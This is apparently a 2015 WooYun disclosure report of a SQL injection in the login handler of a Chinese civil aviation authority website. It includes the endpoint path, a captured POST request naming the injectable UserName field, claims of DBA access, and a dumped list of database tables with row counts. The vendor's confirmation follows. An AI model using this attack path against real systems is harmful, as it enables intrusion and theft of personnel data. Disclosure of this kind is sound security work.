当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139566

漏洞标题:中国民航局某站SQL注入漏洞

相关厂商:中国民航局

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-09 18:49

修复时间:2015-10-26 14:36

公开时间:2015-10-26 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

2333333

详细说明:

存在注入URL:
http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false

登陆页面.png


用户名存在注入,报错信息可看出

保错.png


漏洞证明:

抓post包

POST /Portal/RfSoft.MapleTr.DPS/Hr/Control/LoginHandler.ashx?opType=LOGIN HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false
Content-Length: 64
Cookie: msid=w2lfnpcfzlipsk2ojbnflqpg
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<Login><UserName>123</UserName><Password>1234</Password></Login>


UserName参数存在注入,DBA权限

dba.png


涉及24个库

24库.png


数据量不小

Database: CMSIS
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| TEMP_AET2013110600008        | 669097  |
| TEMP_AET2013110700024        | 642707  |
| TEMP_AET2013110700033        | 495932  |
| MH_RENYUAN_INFO              | 32597   |
| TEMP_AET2013110700015        | 16189   |
| DPS_LOG                      | 15780   |
| TEMP_AET2013110600002        | 10566   |
| TEMP_AET2013110600005        | 6906    |
| FILEINFO                     | 6327    |
| TEMP_AET2013110600011        | 4981    |
| TEMP_AET2013110700038        | 4952    |
| TEMP_AET2013111800003        | 2272    |
| TEMP_AET2013110700018        | 2231    |
| TEMP_AET2013110600006        | 1976    |
| DPS_SE_ROLE_USER             | 1804    |
| TEMP_AET2013110600010        | 1706    |
| ETL_DATA_LOG                 | 1403    |
| ETL_DATAFILE_INFO            | 1403    |
| TEMP_AET2013110600010A       | 1122    |
| DPS_USER                     | 934     |
| DPS_USER_ORG                 | 902     |
| TEMP_AET2013110700036        | 835     |
| MH_MRO_INFO                  | 805     |
| MH_DATA_STATE                | 696     |
| TEMP_AET2013110700027        | 647     |
| TEMP_AET2013110600004        | 495     |
| TEMP_AET2013110700021        | 486     |
| ETL_TABLE_COLUMN             | 428     |
| TEMP_AET2013110600009        | 392     |
| DMD_MODELMEMBERS             | 371     |
| DMD_MODELMEMBERS_HISVERSION  | 317     |
| TEMP_AET2013110400002        | 284     |
| TEMP_AET2013110400003        | 274     |
| MH_JIANCHAYUAN_INFO          | 241     |
| OMD_OBJECTMANAGE_PROPERTRY   | 237     |
| TEMP_AET2013110700041        | 207     |
| TEMP_AET2013111800006        | 196     |
| C_DATADICTIONARY             | 182     |
| DPS_MENU                     | 170     |
| TEMP_ET2013110100003         | 164     |
| TEMP_AET2013110400004        | 150     |
| DPS_SE_AUTHORIZE             | 149     |
| TEMP_AET2013110700030        | 142     |
| TEMP_AET2013110600007        | 126     |
| TEMP_AET2013110600003        | 114     |
| MH_AIRLINE_INFO              | 109     |
| S_AUTOCODE                   | 86      |
| TEMP_AET2013110700009        | 83      |
| C_TREEBASE_LEVELICON         | 53      |
| ETL_CLASS                    | 50      |
| C_TABBASE_PARAM              | 48      |
| LS_INDIVIDUATION_INFO        | 47      |
| BS_BUSINESS_RESOURCE         | 40      |
| DMD_SYSCONFIG                | 40      |
| C_TREEBASE                   | 39      |
| MH_TIANBIAO_INFO             | 36      |
| LS_SYSINFO                   | 34      |
| ETL_TABLE_DATA_RELATION      | 31      |
| TEMP_AET2013110700012        | 31      |
| ETL_SUB_CLASS                | 30      |
| OMD_OBJECTMANAGE_VIEW        | 27      |
| OMD_OBJECTMANAGEVIEW_GROUP   | 27      |
| PUBLISH_INFORM_DEPARTMENT    | 23      |
| DMD_SYSCONFIG_HISTORYVERSION | 22      |
| LDM_SYS_OPTIONS              | 22      |
| WF_WORKFLOW_FUNCTION         | 21      |
| LDM_SYS_MSG                  | 19      |
| DPS_PART_VIEW                | 16      |
| OMD_OBJECT_V_R_FUN           | 14      |
| TREE_HELP_USE                | 12      |
| BS_RESOURCE                  | 11      |
| MH_FENZHIJIGOU_INFO          | 10      |
| DPS_SE_ROLE                  | 8       |
| LINKAGEFORVILLAGE            | 8       |
| DPS_LOG_TYPE                 | 7       |
| DPS_PART_TEMPLATE            | 7       |
| BC_FORMAT                    | 6       |
| MH_DOCUMENTFILE              | 6       |
| DPS_ORGANIZATION             | 5       |
| PULISH_INFORM                | 5       |
| LDM_EXCEL_TOOLS              | 4       |
| LINKAGEFORCITY               | 4       |
| BC_CONNECTION                | 3       |
| C_TABBASE                    | 3       |
| DPS_LOG_FLAGTYPE             | 3       |
| DPS_MESSAGESTATE_TYPE        | 3       |
| BC_CONFIG                    | 2       |
| DC_BASEINFO                  | 2       |
| DC_DIR_ELEMENT_RELATION      | 2       |
| DPS_PART_PAGE                | 2       |
| LINKAGEFORPROVINCE           | 2       |
| BC_INSTANCE                  | 1       |
| CONTROL_FUNCTION             | 1       |
| DC_ROOT_DIR                  | 1       |
| DPS_COMMON_MODULEMENU        | 1       |
| DPS_SITE                     | 1       |
| XF_CODE_COMPANY              | 1       |
+------------------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-11 14:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。同时同步上报给国家上级信息安全协调机构。

最新状态:

暂无